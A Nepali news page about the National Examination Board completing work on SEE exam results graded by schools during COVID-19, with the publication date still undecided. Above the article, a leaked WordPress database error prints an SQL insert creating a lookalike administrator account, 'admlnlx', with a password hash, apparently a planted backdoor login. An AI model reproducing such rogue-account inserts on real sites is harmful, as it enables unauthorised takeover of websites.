WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDuirRmPs2Ofl6MS1lLwnKPCAamr/B/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:08:31', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । राष्ट्रिय परीक्षा बोर्डले माध्यमिक शिक्षा परीक्षा (एसईई) को नतिजा प्रकाशन सम्बन्धी सम्पूर्ण काम पूरा गरेको छ । बोर्डका परीक्षा नियन्त्रक (कक्षा १०) का नियन्त्रक रामराज खकुरेलले नतिजा प्रकाशनको काम पूरा भएको जानकारी बोर्डलाई गराएका छन् ।
बोर्डको बैठक बसेर निर्णय गरेपछि मात्र नतिजा प्रकाशन हुनेछ । योपटक सम्बन्धित स्कुलले नै मूल्यांकन गरेर विद्यार्थीको नतिजा बोर्डमा पठाएका थिए । स्कुलले पठाएको नतिजालाई रुजु गरेर बोर्डले नतिजा प्रकाशन गर्न लागेको हो । बोर्डका अनुसार एसईईमा सहभागी हुन ४ लाख ८२ हजारले फाराम भरेका थिए । तर कोभिड १९ को संक्रमण त्रासका कारण परीक्षा हुन नसकेपछि सम्बन्धित स्कुलले नै मूल्यांकन गरेर नतिजा दिन व्यवस्था गरिएको हो ।
बोर्डमा जानकारी गराएपनि कहिले बैठक बस्ने भन्ने निर्क्यौल भएको छैन । बिगतमा तयारी पूरा हुने बित्तिकै नतिजा सार्वजनिक गर्ने चलन थियो । तर यस पटक स्कुल आफैले मूल्यांकन गरेको नतिजालाई प्रमाणीकरणका लागि मात्रै बोर्डमा पठाएकोले नतिजा कस्तो आउने हो भन्ने कौतुहलता छैन । खकुरेलले भने, ‘आज सार्वजनिक हुने सम्भावना कम छ । भोलि गाइजात्राको दिन पनि नतिजा आउने सम्भावना छैन । पर्सितिर मात्रै सार्वजनिक हुन्छ कि ? ’
साभार अन्नपूर्ण